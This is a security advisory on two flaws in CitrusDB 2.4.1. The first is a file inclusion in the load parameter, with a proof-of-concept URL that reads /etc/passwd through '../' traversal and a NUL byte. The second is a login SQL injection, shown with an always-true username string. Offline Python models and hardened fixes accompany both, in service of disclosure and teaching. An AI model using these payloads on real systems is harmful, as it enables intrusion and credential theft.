CitrusDB 2.4.1 - LFI/SQLi Vulnerability

Author: Michal `wacky` Blaszczak
WWW: blaszczakm.blogspot.com


CitrusDB is an open source customer service and billing database.
It can be used by customer service personnel to provide sales and support to customers,
and by billing staff to bill customers for their services via invoices and credit card batches.
Customers may access the Online customer account manager to view their services, billing history,
and make service and support requests online.

1) LFI
http://192.168.51.8/lab/citrus-2.4.1/index.php?load=../../../../../etc/passwd%00&type=base

index.php:315

$filepath = "$path_to_citrus/$load.php";   // $load is taken from the request (?load=...) unmodified
if (file_exists($filepath)) {
    include('./'.$load.'.php');            // checks one path, includes a different one; neither is confined to the application directory
}

The load parameter is used as a path without any sanitisation, so "../" sequences walk out of the CitrusDB directory. The %00 in the proof-of-concept URL is a NUL byte: on PHP versions before 5.3.4 the path is handed to the C library as a C string, which stops at the NUL, so both the checked path and the included path lose the appended ".php" and resolve to /etc/passwd, which is then included and, having no PHP tags, printed verbatim. Two practical caveats: the NUL trick needs magic_quotes_gpc off (it would escape the byte as \0), and from PHP 5.3.4 onwards paths containing NUL are rejected, which stops the /etc/passwd read but leaves the traversal itself, so any file ending in .php that the web server can read can still be included through ?load=.

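The following is an added example, not CitrusDB code and not part of the original advisory. It models the index.php:315 logic in Python against a constructed directory tree: the NUL truncation of pre-5.3.4 PHP is reproduced explicitly by cutting the string at the first NUL before it reaches the filesystem, and the assumed cwd for the include() is the CitrusDB directory. Beside it is a hardened resolver that rejects NUL bytes, canonicalises the path and refuses anything outside the application directory.

```python
import os
import tempfile
from typing import Optional

# Constructed example, not CitrusDB code. Models what index.php:315 does with
# ?load=... on a PHP build that still truncated paths at NUL (before 5.3.4).


def c_string(s: str) -> str:
    """Old PHP passed paths to libc as C strings: everything after the first NUL is dropped."""
    return s.split("\0", 1)[0]


def vulnerable_include_path(load: str, path_to_citrus: str) -> str:
    """Model of the original logic: file_exists() on one path, include() of another.

    Returns the path the kernel would actually open for the include, or "" if the
    file_exists() guard would have rejected it. Assumes (as a web request to index.php
    normally gets) that PHP's cwd is the CitrusDB directory.
    """
    checked = c_string(f"{path_to_citrus}/{load}.php")   # $filepath = "$path_to_citrus/$load.php"
    if not os.path.exists(checked):                      # if (file_exists($filepath))
        return ""
    included = c_string(f"./{load}.php")                 # include('./'.$load.'.php')
    return os.path.normpath(os.path.join(path_to_citrus, included))


def safe_include_path(load: str, path_to_citrus: str) -> Optional[str]:
    """Hardened replacement (our suggestion, not the project's fix): reject NUL, resolve
    the real path, and require that it stays inside path_to_citrus. A fixed allow-list of
    module names would be stricter still; CitrusDB's real module names are not in the advisory.
    """
    if not load or "\0" in load:
        return None
    base = os.path.realpath(path_to_citrus)
    target = os.path.realpath(os.path.join(base, load + ".php"))
    if os.path.commonpath([base, target]) != base:       # escaped the application directory
        return None
    return target if os.path.isfile(target) else None


def demo() -> dict:
    """Build a constructed tree (root/www/citrus/main.php and root/secret.txt) and run
    both resolvers against a legitimate module and a traversal payload shaped like the
    advisory's one (../ sequences followed by a NUL)."""
    with tempfile.TemporaryDirectory() as root:
        citrus = os.path.join(root, "www", "citrus")
        os.makedirs(citrus)
        main_php = os.path.join(citrus, "main.php")
        with open(main_php, "w") as f:
            f.write("<?php // legitimate module\n")
        secret = os.path.join(root, "secret.txt")        # stands in for /etc/passwd
        with open(secret, "w") as f:
            f.write("root:x:0:0:root:/root:/bin/sh\n")
        traversal = "../../secret.txt\0"                  # ?load=../../secret.txt%00
        return {
            "vuln_legit": vulnerable_include_path("main", citrus),
            "vuln_traversal": vulnerable_include_path(traversal, citrus),
            "safe_legit": safe_include_path("main", citrus),
            "safe_traversal": safe_include_path(traversal, citrus),
            "safe_traversal_no_nul": safe_include_path("../../secret", citrus),
            "main": main_php,
            "main_real": os.path.realpath(main_php),
            "secret": secret,
        }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:22} {v!r}")
```

In the vulnerable model the guard passes because the NUL-truncated checked path really does exist, and the include opens the secret file; the hardened resolver returns None for the same input and for the NUL-free traversal, while still serving the legitimate module.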
2) SQL INJECTION

include/user.class.php:134

$sql="SELECT password FROM user WHERE username='$user_name' LIMIT 1";   // $user_name goes into the SQL text unescaped

The username supplied at login is concatenated straight into the query with no escaping and no parameter binding. A single quote in the username closes the string literal and whatever follows is executed as SQL, so the WHERE clause is under the attacker's control. The fix is to pass $user_name as a bound query parameter (or, failing that, to run it through the database driver's escaping function before concatenation).

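The following is an added example, not CitrusDB code and not part of the original advisory. It reproduces the query shape from include/user.class.php:134 against a throw-away SQLite table with constructed rows, so the effect of the unescaped concatenation can be seen offline, and shows the bound-parameter form beside it. The injected username is a generic illustration of the vulnerability class, not a payload tested against CitrusDB.

```python
import sqlite3
from typing import Optional

# Constructed example, not CitrusDB code: same SQL shape as the advisory's line,
# run against an in-memory SQLite table with made-up rows.


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO user VALUES (?, ?)",
        [("admin", "s3cret-admin"), ("bob", "bobs-pass")],   # constructed sample rows
    )
    return conn


def password_for_vulnerable(conn: sqlite3.Connection, user_name: str) -> Optional[str]:
    """Same construction as the advisory's line: the name is interpolated into the SQL text."""
    sql = f"SELECT password FROM user WHERE username='{user_name}' LIMIT 1"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def password_for_safe(conn: sqlite3.Connection, user_name: str) -> Optional[str]:
    """Hardened form: the name travels as a bound parameter and is never parsed as SQL."""
    row = conn.execute(
        "SELECT password FROM user WHERE username=? LIMIT 1", (user_name,)
    ).fetchone()
    return row[0] if row else None


def quote_breaks_query(conn: sqlite3.Connection, user_name: str) -> bool:
    """Detection probe: a bare quote turning into a syntax error is the classic sign that
    input reaches the SQL text unescaped. Returns True if the vulnerable query errors."""
    try:
        password_for_vulnerable(conn, user_name)
        return False
    except sqlite3.Error:
        return True


# A username that closes the quoted literal and makes the WHERE clause always true:
#   SELECT password FROM user WHERE username='' OR ''='' LIMIT 1
INJECTED_NAME = "' OR ''='"


if __name__ == "__main__":
    db = make_db()
    print("probe with admin'   ->", quote_breaks_query(db, "admin'"))
    print("vulnerable, injected ->", password_for_vulnerable(db, INJECTED_NAME))
    print("safe, injected       ->", password_for_safe(db, INJECTED_NAME))
```

The vulnerable lookup hands back a password for a username that exists in no row at all, because the injected text rewrote the condition; the bound-parameter version treats the same string as an ordinary (non-matching) username and returns nothing. SQLite doubles quotes instead of backslash-escaping them, so the exact error text differs from MySQL, but the single-quote probe errors on both.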

